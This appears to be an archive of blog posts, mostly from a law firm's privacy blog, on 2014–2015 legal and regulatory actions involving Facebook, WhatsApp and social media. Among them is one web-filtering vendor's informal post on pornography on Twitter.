Recent class actions filed against Facebook and Shutterfly are the first cases to test an Illinois law that requires consent before biometric information may be captured for commercial purposes. Although the cases focus on biometric capture activities primarily in the social-media realm, these cases and the Illinois law at issue have ramifications for any business that employs biometric-capture technology, including those who use it for security or sale-and-marketing purposes. In a recent article published in Law360, Hunton & Williams partner, Torsten M. Kracht, and associate, Rachel E. Mossman, discuss how businesses already using these technologies need to keep abreast of new legislation that might affect the legality of their practices, and how businesses considering the implementation of these technologies should consult local rules and statutes before implementing biometric imaging.

Read the full article now.

Europe’s Highest Court Delays Decision in Safe Harbor Case Schrems vs. Facebook

On June 9, 2015, Max Schrems tweeted that the Advocate General of the European Court of Justice (“ECJ”) will delay his opinion in Europe v. Facebook, a case challenging the U.S.-EU Safe Harbor Framework. The opinion was previously scheduled to be issued on June 24. No new date has been set.

The delay may allow the U.S. and EU to conclude their negotiations regarding updating the Safe Harbor Framework before the ECJ issues an opinion that could impact the Framework. According to reports, although certain issues concerning the national security exemptions to the U.S.-EU Safe Harbor Framework still need to be resolved, the negotiations are expected to be concluded within weeks.

In his case against Facebook, Austrian law student Max Schrems challenges the Irish Data Protection Commissioner’s claim that the Safe Harbor agreement precluded the agency from stopping data transfers from Ireland to the U.S. by Facebook, which participates in the Safe Harbor. Schrems’ case was prompted by the Snowden revelations about U.S. national security authorities accessing personal data of EU citizens transferred to the U.S. via the Safe Harbor Framework. Schrems is seeking the end of the U.S.-EU Safe Harbor Framework.

Belgian Data Protection Authority Issues Recommendation on Facebook’s User Tracking

On May 13, 2015, the Belgian Data Protection Authority (the “DPA”) published a recommendation addressing the use of social plug-ins associated with Facebook and its services (the “Recommendation”). The Recommendation stems from the recent discussions between the DPA and Facebook regarding Facebook’s privacy policy and the tracking of individuals’ Internet activities.

In taking the position that Facebook is subject to Belgian data protection law, the Recommendation focuses on the legitimacy of tracking user activities through Facebook’s social plug-ins. When used to track Internet activities, the DPA asserts that Facebook should obtain a user’s unambiguous and specific consent prior to placing or obtaining cookies through social plug-ins. The DPA further finds that it is excessive to systematically collect information concerning individuals’ visits to websites that contain social plug-ins, even where individuals do not interact with the social plug-ins.

The Recommendation advocates that Facebook be transparent regarding its use of cookies and cease collecting information through cookies and social plug-ins from non-Facebook users or users who have de-activated or logged out of their Facebook account without first obtaining opt-in consent. With respect to active Facebook users, the DPA noted that Facebook should only collect and use information through cookies and social plug-ins when strictly necessary to provide a service explicitly requested by the particular user. In all other cases, opt-in consent from Facebook users is required, according to the DPA.

Furthermore, the Recommendation warns against automatically sharing information with Facebook based on the mere presence of a social plug-in. As a final recommendation to Facebook, the DPA emphasizes that Facebook should modify its user interface to facilitate opt-in consent from its users for the collection and use of information obtained through cookies, in particular, for the use of this information for advertising purposes.

The Recommendation also includes guidance aimed at owners and hosts of websites using social plug-ins from Facebook, as well as Internet users. With regard to website owners and hosts, the DPA points out that they should ensure that social network buttons are only activated after the website users’ consent has been obtained. To comply with this obligation, the DPA recommends the use of instruments, such as “Social Share Privacy,” to help ensure that third party plug-ins only connect to the third party’s servers after the user has clicked on the social plug-in button.

The DPA has indicated in the media that an enforcement action against Facebook may be necessary if the recommendation is not followed.

Twitter – Den of Iniquity or Paragon of Virtue… or Someplace in Between?


Twitter - Den of Iniquity or Paragon of Virtue or Someplace in Between


Recently there's been some coverage of Twitter's propensity for porn. Some research has shown that
one in every thousand tweets contains something pornographic. With 8662 tweets purportedly sent every second, that's quite a lot.

Now, this is not something that has escaped our notice here at Smoothwall HQ. We like to help our customers keep the web clean and tidy for their users, and mostly that means free of porn. With Twitter that's particularly difficult. Their filtering isn't easy to enforce and, while we have had some reasonable results with a combination of search term filtering and stripping certain tweets based on content, it's still not optimal. Twitter does not enforce content marking and 140 characters is right on the cusp of being impossible to content filter.

That said - how porn riddled is Twitter? Is there really sex round every corner? Is that little blue bird a pervert? Well, what we've found is: it's all relative.

Twitter is certainly among the more gutter variety of social networks, with Tumblr giving it a decent run for boobs-per-square-inch, but the likes of Facebook are much cleaner — with even images of breastfeeding mothers causing some controversy.

Interestingly, however, our back-of-a-beermat research leads us to believe that about 40 in every 1000 websites is in some way linked to porn — these numbers come from checking a quarter of a million of the most popular sites through Smoothwall's web filter and seeing what gets tagged as porn. Meanwhile, the Huffington Post reports that 30% of all Internet traffic is porn - the biggest number thus far. However, given the tendency of porn toward video, I guess we shouldn't be shocked.

Twitter: hard to filter, relatively porn-rich social network which is only doing its best to mirror the makeup of the Internet at large. As a school network admin, I would have it blocked for sure: Twitter themselves used to suggest a minimum age of 13, though this requirement quietly went away in a recent update to their terms of service.

German DPA Appeals Court Decision on Facebook Fan Pages and Suggests Clarification by ECJ on Data Controllership

On January 14, 2015, the data protection authority of the German federal state of Schleswig-Holstein (“Schleswig DPA”) issued an appeal challenging a September 4, 2014 decision by the Administrative Court of Appeals, which held that companies using Facebook’s fan pages cannot be held responsible for data protection law violations committed by Facebook because the companies do not have any control over the use of the data.

The Schleswig DPA claimed that because companies create the fan pages, they are responsible for the data collected and processed by Facebook through the fan pages for purposes such as behavioral advertising. The Schleswig DPA also alleged that the court failed to (1) examine Facebook´s business model, (2) assess technical details related to the functioning of fan pages, and (3) consider the social use of fan pages. The Schleswig DPA argued that the Court of Appeals is in an appropriate position to rule and review decisions of lower courts only after it addresses the three issues above. In addition, the Schleswig DPA stated that Facebook´s business model violates a number of provisions in the German Telemedia Act, including the sections related to user profiling. The Schleswig DPA also suggested that if the court does not concur with the Schleswig DPA’s interpretation of EU data protection law regarding data controllership on social networking websites, the case should be referred to the European Court of Justice (“ECJ”) for a preliminary ruling. An ECJ preliminary ruling is a decision regarding the interpretation of European Union law at the request of a EU member state court.

SEC Issues New Guidance on the Use of Social Media

On April 21, 2014, the Securities and Exchange Commission’s Division of Corporation Finance published new Compliance and Disclosure Interpretations (“C&DIs”) concerning the use of social media in certain securities offerings, business combinations and proxy contests. Notably, the C&DIs permit the use of an active hyperlink to satisfy the cautionary legend requirements in social media communications when the social media platform limits the text or number of characters that may be included (e.g., Twitter). The C&DIs also clarify that postings or messages re-transmitted by unrelated third parties generally will not be attributable to the issuer (so issuers will not be required to ensure that third parties comply with the guidance). In addition, requirements regarding cautionary legends contemplated by the C&DIs apply to both issuers and other soliciting parties in proxy fights or tender offers. Accordingly, although the new guidance will allow issuers to communicate with their shareholders and potential investors via social media, it also may prove useful to activists in proxy fights and tender offers.

Read the full client alert on the SEC’s new C&DIs.

FTC Notifies Facebook, WhatsApp of Privacy Obligations in Light of Proposed Acquisition

On April 10, 2014, the Federal Trade Commission announced that the Director of the FTC’s Bureau of Consumer Protection had notified Facebook and WhatsApp Inc., reminding both companies of their obligation to honor privacy statements made to consumers in connection with Facebook’s proposed acquisition of WhatsApp.

In a letter to the companies, Bureau Director Jessica Rich wrote, “WhatsApp has made a number of promises about the limited nature of the data it collects, maintains, and shares with third parties – promises that exceed the protections currently promised to Facebook users. We want to make clear that, regardless of the acquisition, WhatsApp must continue to honor these promises to consumers.”

The letter further noted that the companies could be in violation of Section 5 of the FTC Act if WhatsApp fails to honor its promises after the acquisition is completed, and that Facebook also may be in violation of the FTC’s 2012 order against Facebook, which settled allegations from the FTC that Facebook deceived consumers by making false privacy promises.

Read the related post on the FTC’s Business Center Blog.

German Appeals Court Finds German Data Protection Law Applicable to Facebook

On January 24, 2014, the Chamber Court of Berlin rejected Facebook’s appeal of an earlier judgment by the Regional Court of Berlin in cases brought by a German consumer rights organization. In particular, the court: 

  • enjoined Facebook from, broadly, operating its “Find a Friend” functionality in a way that violates the German Unfair Competition Act;
  • enjoined Facebook from using certain provisions in (1) its terms and conditions, and (2) privacy notices concerning advertisements, licensing, personal data relating to third parties and personal data collected through other websites; and
  • mandated that Facebook provide users with more information about how their address data will be used by the “Find a Friend” functionality.

Similar to its earlier case against Apple, the German consumer rights organization successfully argued that German, not Irish, data protection law applied. Although other German courts have not always accepted this line of reasoning, the court followed it here and, notably, also held that a breach of data protection law also may constitute a breach of the Unfair Competition Act. This approach represents a new development in the data protection context. One of the conditions for consumer rights organizations to be able to commence legal proceedings is that there is a violation of the Unfair Competition Act. Recognizing data protection law violations as violations of the Unfair Competition Act therefore arguably makes it easier for consumer rights organizations to bring privacy-oriented cases. It also can be seen as part of a wider trend to improve the ability of German consumer rights organizations to sue for breaches of data protection law.

The Chamber Court’s ruling is not yet binding and is subject to appeal.